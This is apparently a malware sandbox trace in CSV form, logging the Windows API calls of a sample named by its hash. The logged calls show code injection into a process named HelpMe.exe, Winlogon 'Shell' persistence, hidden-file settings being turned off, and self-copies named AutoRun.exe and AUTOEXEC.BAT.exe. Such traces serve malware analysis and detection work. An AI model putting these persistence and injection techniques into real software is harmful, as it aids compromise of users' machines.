"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00280000","th32ProcessID->420","szExeFile->8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","lpAddress->0x00000000","dwSize->65536","flAllocationType->0x00002000","flProtect->0x00000004"
"20190731003623.246","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00280000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00280000","dwSize->257","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003623.246","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000090","hKey->0x000000ac","lpSubKey->Software\Microsoft\Windows\CurrentVersion\ThemeManager"
"20190731003623.246","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000090","lpValueName->Compositing"
"20190731003623.246","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000090","hKey->0x000000ac","lpSubKey->Control Panel\Desktop"
"20190731003623.246","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000090","lpValueName->LameButtonText"
"20190731003623.246","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x5ad70000","lpFileName->uxtheme.dll"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","process","CreateRemoteThread","SUCCESS","0x000000ac","lpStartAddress->0x00404008","th32ProcessID->612","szExeFile->HelpMe.exe"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","process","CreateRemoteThread","SUCCESS","0x000000b0","lpStartAddress->0x00404008","th32ProcessID->612","szExeFile->HelpMe.exe"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000000bc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExA","SUCCESS","","hKey->0x000000bc","lpValueName->Shell","dwType->1","lpData->Explorer.exe  HelpMe.exe","cbData->25"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000000c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExA","SUCCESS","","hKey->0x000000c0","lpValueName->CheckedValue","dwType->4","lpData->0","cbData->4"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000000c8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000c8","lpValueName->Startup"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000000c8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000000c8","lpValueName->Startup","dwType->1","lpData->C:\Documents and Settings\janettedoe\Start Menu\Programs\Startup","cbData->130"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x774e0000","lpFileName->ole32.dll"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000cc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000cc","lpValueName->NoNetHood"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000cc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000cc","lpValueName->NoPropertiesMyComputer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->NoInternetIcon"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->NoCommonGroups"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->NoControlPanel"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->NoSetFolders"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExA","SUCCESS","0x000000ba","hKey->HKEY_CLASSES_ROOT","lpSubKey->CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000ba","lpValueName->(null)"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->SystemSetupInProgress"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\CurrentControlSet\Control\MiniNT"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\WPA\PnP"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->seed"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->OsLoaderPath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->OsLoaderPath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->SystemPartition"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->SystemPartition"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->SourcePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->SourcePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->ServicePackSourcePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->ServicePackSourcePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->ServicePackCachePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->ServicePackCachePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->DriverCachePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->DriverCachePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->DevicePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","synchronization","CreateMutexW","SUCCESS","0x000000cc","lpName->(null)"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","synchronization","CreateMutexW","SUCCESS","0x000000d8","lpName->(null)"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","synchronization","CreateMutexW","SUCCESS","0x000000e0","lpName->(null)"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e4","lpValueName->LogLevel"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e4","lpValueName->LogLevel"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->LogPath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000e4","lpSubKey->AppLogLevels"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x77920000","lpFileName->SETUPAPI.dll"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Rpc\PagedBuffers"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExA","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Rpc"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144\RpcThreadPoolThrottle"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows NT\Rpc"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryW","SUCCESS","0x77e70000","lpFileName->rpcrt4.dll"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000010c","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000108","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000000e4","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->55746"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CopyFileExW","SUCCESS","","lpExistingFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","lpNewFileName->C:\AutoRun.exe"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000114","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->268"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000114","lpFileName->C:\AUTOEXEC.BAT","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->268"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000114","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000000e4","lpFileName->C:\AUTOEXEC.BAT","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000118","lpFileName->C:\AUTOEXEC.BAT.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000120","dwIoControlCode->0x004d0008","lpInBuffer->0x00000000","nInBufferSize->0x00000000","lpOutBuffer->0x0120f37c","nOutBufferSize->0x00000208","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","FAILURE","","hDevice->0x00000120","dwIoControlCode->0x006d0008","lpInBuffer->0x0049bc58","nInBufferSize->0x00000046","lpOutBuffer->0x00498c60","nOutBufferSize->0x00000020","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
